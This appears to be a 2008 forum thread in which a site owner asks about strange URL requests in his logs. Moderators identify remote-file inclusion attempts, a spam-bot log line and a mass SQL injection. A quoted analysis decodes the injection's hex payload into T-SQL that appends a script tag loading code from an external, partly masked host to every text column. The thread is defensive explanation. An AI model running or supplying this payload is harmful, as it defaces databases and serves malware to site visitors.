URL puzzle - Posted (3473 Views)
Mr Pink
Junior Member
Mr Pink
Posts: 387
387
One of my sites uses Fullxml which is perfect for the job. This week I have noticed a handful of strange url requests to the site like this

default.asp?id=28&mnu=http://www.domain.co.uk/forum/lovuqo/zil/&

I'm puzzled as to why someone is accessing the site by adding the http bit to the normal url. There are a few of these and they are all different. <
Martin
Leyland Forum Leyland Lancashire UK
 Sort direction, for dates DESC means newest first  
 Page size 
Posted
Podge
Support Moderator
Podge
Posts: 3776
3776
Maybe they are redirecting traffic and are trying to mask the destination? A bit like the way spammers use tinyurl ?<
Podge. The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)
My Mods: CAPTCHA Mod | GateKeeper Mod Tutorial: Enable subscriptions on your board
Warning: The post above or below may contain nuts.
Posted
Mr Pink
Junior Member
Mr Pink
Posts: 387
387
Hi Podge

The link doesn't redirect, it just displays the page in the normal way.<
Martin
Leyland Forum Leyland Lancashire UK
Posted
Podge
Support Moderator
Podge
Posts: 3776
3776
I don't know what they are doing then. Is this the url - http:/www.fabcraft.co.uk/forum/lovuqo/zil/&page=402<
Podge. The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)
My Mods: CAPTCHA Mod | GateKeeper Mod Tutorial: Enable subscriptions on your board
Warning: The post above or below may contain nuts.
Posted
MarcelG
Retired Support Moderator
MarcelG
Posts: 2625
2625
THey may be trying to pass wrong values to your code, in an effort to hack your site. I've seen similar attempts on oxle.com, where they try to insert PHP scripts....with no succes of course.<
portfolio - linkshrinker - oxle - twitter
Posted
Mr Pink
Junior Member
Mr Pink
Posts: 387
387
That's one of the sites. I think they are all the same people though

I have been getting more spam on my guestbook recently. It seems to come in waves, it will be quiet for a few months then lots of activity.
<
Martin
Leyland Forum Leyland Lancashire UK
Last edited by Mr Pink on 02 February 2008, 10:07
Posted
Mr Pink
Junior Member
Mr Pink
Posts: 387
387
Today I found this. Looks like a new method of doing something, but what is it?
default.asp?id=0&ACT=7&page=17 Result: using proxy 97.81.19.227:8080;GET-timeouts 2;POST-timeouts 1;chosen nickname "frontivillete";captcha recognized;sent;&<
Martin
Leyland Forum Leyland Lancashire UK
Posted
Mr Pink
Junior Member
Mr Pink
Posts: 387
387
default.asp?id=2&mnu=2;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045

Does anyone know what the above inserted into a url will do? <
Martin
Leyland Forum Leyland Lancashire UK
Posted
AnonJr
Forum Moderator
AnonJr
Posts: 5768
5768
Off the top of my head it looks like its trying to inject some SQL, but I couldn't say for sure what its specifically trying to do. If you sanitize your query strings properly I don't think its anything to worry about. But I'd get a second opinion on that. wink<
Posted
Podge
Support Moderator
Podge
Posts: 3776
3776
Its part of a mass sql injection attack - http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

This looks a little complicated but, if we remove the encoding, we get this:

DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000));
EXEC(@S);--

So, here's what this little bit of T-SQL is doing:

Declaring a variable, S, as an NVARCHAR. For those of us who don't speak T-SQL natively, think of this as a string.
Taking a long hex value (I took out a few hundred characters where the ... is there) that is really a Unicode string(1) and casting it as NVARCHAR. In other words, we're taking this hex representation of a string and turning it into a real string.
Once that's done, we execute that string as a T-SQL statement.
So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This one is a little more complicated but it does something like this:

Declare a few variables that are used later.
Do a SQL query on the sysobjects and syscolumns tables. This is some serious mojo as these tables contain a list of ALL the tables and ALL the columns in the database. What this query is looking for is every column in the entire database with a type that contains strings.
Now, we're going to loop through all of those columns and, in every one of them...
...we're going to append the <script>...</script> text.
Finally, clean up and we're done.
Now that this has run, every bit of text in your database has this malicious script tag appended to it. If you're using that database to contain text/HTML that you're going to insert into your webpages and display to your users, you are now serving up a malicious script to every one of your trusting customers.

<
Podge. The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)
My Mods: CAPTCHA Mod | GateKeeper Mod Tutorial: Enable subscriptions on your board
Warning: The post above or below may contain nuts.
Posted
Podge
Support Moderator
Podge
Posts: 3776
3776
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE

Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.
http://www.string-functions.com/hex-string.aspx<
Podge. The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)
My Mods: CAPTCHA Mod | GateKeeper Mod Tutorial: Enable subscriptions on your board
Warning: The post above or below may contain nuts.
Last edited by Podge on 13 May 2008, 09:29
You Must enter a message